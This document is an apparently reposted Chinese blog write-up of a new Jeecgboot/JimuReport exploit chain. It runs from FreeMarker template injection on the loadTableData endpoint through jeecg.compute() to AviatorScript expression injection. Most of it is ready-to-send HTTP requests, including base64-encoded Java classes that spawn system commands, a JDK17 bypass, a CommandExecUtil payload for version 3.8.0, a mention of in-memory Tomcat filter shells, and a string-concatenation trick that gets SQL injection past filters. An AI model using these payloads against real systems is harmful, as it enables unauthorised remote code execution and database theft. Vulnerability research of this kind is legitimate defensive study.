文章总结: 文档分析了Jeecgboot框架中SSTI漏洞的修复与新型利用链。作者发现虽然Freemarker模板注入已被修复,但通过jeecg对象的compute()方法可触发AviatorScript表达式注入,实现命令执行或内存马植入。提供了具体Payload构造方法及针对高版本JDK的绕过技巧,同时演示了利用Freemarker拼接绕过SQL拦截的案例。 综合评分: 85 文章分类: 漏洞分析,WEB安全,安全开发,实战经验,红队
Jeecgboot SSTI老洞新招
原创
XG小刚 XG小刚
XG小刚
2026年6月24日 14:04 北京
在小说阅读器读本章
去阅读
本实验仅用于信息防御教学,切勿用于它用途
公众号:XG小刚
Jeecgboot SSTI老洞新招
之前测项目遇到Jeecgboot框架,想去尝试一下模板注入那两个历史漏洞,发现queryFieldBySql和loadTableData接口可以未授权访问,但是这俩接口的freemark模板注入已经被修复了
Jeecgboot修复的方式也很简单,就是jimureport的1.6.1版本开始,使用了freemark自身的配置setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER),限制了new()可用的三个类。
想尝试一下沙箱绕过,发现freemark版本高于2.3.30,没法利用protectionDomain进行绕过沙箱利用。
而且springMacroRequestContext也未开启,没法去禁用freemark沙箱,所以也就彻底修复了。
然后去尝试save接口的AviatorScript表达式注入也没利用成功……
新发现
继续尝试freemark沙箱绕过时,是需要找到一个可用的object,才能调用对应的方法或者获取对应class
然后发现在执行freemark模板时,传入了两个实例jeecg和isNotEmpty
跟进FreemarkerMethod类里面,发现里面有个compute()方法,并且该方法可以执行AviatorScript表达式
那么只要利用freemark去调用jeecg的compute()方法,然后传递对应参数就可以构造freemark模板到AviatorScript表达式注入的利用链
POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Host: 127.0.0.1:18080
Content-Type: application/json;charset=UTF-8
Content-Length: 113
{"dbSource":"","sql":"select \"${jeecg.compute(null,{'a':'a'},'7*7')}\"","tableName":"","pageNo":1,"pageSize":10}
然后利用Aviator表达式命令执行或打内存马就行了
freemark->Aviator利用
利用java-chains生成表达式即可
命令执行
POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Host: 127.0.0.1:18080
Content-Type: application/json;charset=UTF-8
Content-Length: 1386
{"dbSource":"","sql":"callll{${jeecg.compute(null,{'1':'1'},\"use org.springframework.cglib.core.*;use org.springframework.util.*;ReflectUtils.defineClass('Test',Base64Utils.decodeFromString('yv66vgAAADIAQAEABFRlc3QHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAEYmFzZQEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA3NlcAEAA2NtZAEABjxpbml0PgEAAygpVgEAE2phdmEvbGFuZy9FeGNlcHRpb24HAAsMAAkACgoABAANAQAHb3MubmFtZQgADwEAEGphdmEvbGFuZy9TeXN0ZW0HABEBAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7DAATABQKABIAFQEAEGphdmEvbGFuZy9TdHJpbmcHABcBAAt0b0xvd2VyQ2FzZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7DAAZABoKABgAGwEAA3dpbggAHQEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaDAAfACAKABgAIQEAB2NtZC5leGUIACMMAAUABgkAAgAlAQACL2MIACcMAAcABgkAAgApAQAHL2Jpbi9zaAgAKwEAAi1jCAAtDAAIAAYJAAIALwEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgcAMQEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYMAAkAMwoAMgA0AQAFc3RhcnQBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsMADYANwoAMgA4AQAIPGNsaW5pdD4BABJvcGVuIC1hIGNhbGN1bGF0b3IIADsKAAIADQEABENvZGUBAA1TdGFja01hcFRhYmxlACEAAgAEAAAAAwAJAAUABgAAAAkABwAGAAAACQAIAAYAAAACAAEACQAKAAEAPgAAAIQABAACAAAAUyq3AA4SELgAFrYAHBIetgAimQAQEiSzACYSKLMAKqcADRIsswAmEi6zACoGvQAYWQOyACZTWQSyACpTWQWyADBTTLsAMlkrtwA1tgA5V6cABEyxAAEABABOAFEADAABAD8AAAAXAAT/ACEAAQcAAgAACWUHAAz8AAAHAAQACAA6AAoAAQA+AAAAGgACAAAAAAAOEjyzADC7AAJZtwA9V7EAAAAAAAA='),ClassLoader.getSystemClassLoader());\")};#{1}","tableName":"","pageNo":1,"pageSize":10}
打tomcat的Filter内存马
实战环境会遇到高版本JDK导致的拦截,比如JDK17
可以使用Whoopsunix师傅的高版本Aviator 表达式注入方法
https://whoopsunix.com/docs/java/Expression/Aviator/
POST /jeecg-boot/jmreport/loadTableData?previousPage=1&shareToken=123&token=1 HTTP/1.1
Host: 127.0.0.1:18080
Content-Type: application/json;charset=UTF-8
Content-Length: 1586
{"dbSource":"","sql":"callll{${jeecg.compute(null,{'1':'1'},\"use org.apache.commons.codec.binary.Base64;use org.springframework.cglib.core.*;use org.springframework.util.*;use java.security.*;ReflectUtils.defineClass('org.springframework.expression.Testaa',Base64.decodeBase64('yv66vgAAADIAQAEAJW9yZy9zcHJpbmdmcmFtZXdvcmsvZXhwcmVzc2lvbi9UZXN0YWEHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAEYmFzZQEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA3NlcAEAA2NtZAEABjxpbml0PgEAAygpVgEAE2phdmEvbGFuZy9FeGNlcHRpb24HAAsMAAkACgoABAANAQAHb3MubmFtZQgADwEAEGphdmEvbGFuZy9TeXN0ZW0HABEBAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7DAATABQKABIAFQEAEGphdmEvbGFuZy9TdHJpbmcHABcBAAt0b0xvd2VyQ2FzZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7DAAZABoKABgAGwEAA3dpbggAHQEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaDAAfACAKABgAIQEAB2NtZC5leGUIACMMAAUABgkAAgAlAQACL2MIACcMAAcABgkAAgApAQAHL2Jpbi9zaAgAKwEAAi1jCAAtDAAIAAYJAAIALwEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgcAMQEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYMAAkAMwoAMgA0AQAFc3RhcnQBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsMADYANwoAMgA4AQAIPGNsaW5pdD4BABJvcGVuIC1hIGNhbGN1bGF0b3IIADsKAAIADQEABENvZGUBAA1TdGFja01hcFRhYmxlACEAAgAEAAAAAwAJAAUABgAAAAkABwAGAAAACQAIAAYAAAACAAEACQAKAAEAPgAAAIQABAACAAAAUyq3AA4SELgAFrYAHBIetgAimQAQEiSzACYSKLMAKqcADRIsswAmEi6zACoGvQAYWQOyACZTWQSyACpTWQWyADBTTLsAMlkrtwA1tgA5V6cABEyxAAEABABOAFEADAABAD8AAAAXAAT/ACEAAQcAAgAACWUHAAz8AAAHAAQACAA6AAoAAQA+AAAAGgACAAAAAAAOEjyzADC7AAJZtwA9V7EAAAAAAAA='),ClassLoader.getSystemClassLoader(),nil,Class.forName('org.springframework.expression.ExpressionParser'));\")};#{1}","tableName":"","pageNo":1,"pageSize":10}
新版jeecgboot3.8.0开始多了个CommandExecUtil.execCommand()静态方法,也可以直接使用Aviator绕过JDK17进行命令执行
但是新版绕过授权方式修复了,所以只能在有token的情况下利用了
POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Host: 127.0.0.1:18080
Content-Type: application/json;charset=UTF-8
Content-Length: 285
{"dbSource":"","sql":"callll{${jeecg.compute(null,{'1':'1'},\"use org.apache.commons.lang3.StringUtils;use org.jeecg.modules.airag.llm.handler.CommandExecUtil;CommandExecUtil.execCommand('open -a calculator',StringUtils.split('',''));\")};#{1}","tableName":"","pageNo":1,"pageSize":10}
freemark->sql利用
至于针对SQL注入的拦截,使用freemark的拼接即可完全绕过,就不过多说了
POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Host: 127.0.0.1:18080
X-Access-Token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3ODIyMzIzODIsInVzZXJuYW1lIjoiYWRtaW4ifQ.NAD7IHucl0qpPHafOZzrZcnhaiS49TVHRL6h8zAs-zU
Content-Type: application/json;charset=UTF-8
Content-Length: 215
{"dbSource":"","sql":"${\"se\"+\"lect upd\"+\"atexml(1,concat('~',(select table_name from informati\"+\"on_schema.tables where table_schema=database() limit 0,1),'~'),1)\"}" ,"tableName":"","pageNo":1,"pageSize":10}
求职
另外本人求职:渗透/攻防,base北京
有合适岗位的欢迎滴滴我
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:XG小刚 XG小刚 XG小刚《Jeecgboot SSTI老洞新招》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论